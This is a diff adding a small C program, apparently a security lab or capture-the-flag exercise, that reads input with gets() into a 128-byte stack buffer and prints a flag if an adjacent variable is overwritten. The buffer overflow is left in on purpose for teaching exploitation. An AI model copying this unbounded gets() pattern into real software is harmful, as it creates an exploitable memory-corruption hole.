+++ b/pa/lab6/simple.c
@@ -0,0 +1,23 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include "general.h"
+
+int main() {
+  init();
+  int test;
+  char buffer[128];
+
+  printf("You win this game if you change variable test to a value different from 0.\n");
+
+  test = 0;
+  gets(buffer);
+
+  if(test != 0) {
+      printf("YOU WIN!\n");
+      printf("Flag: %s\n", getflag());
+  } else {
+      printf("Try again...\n");
+  }
+}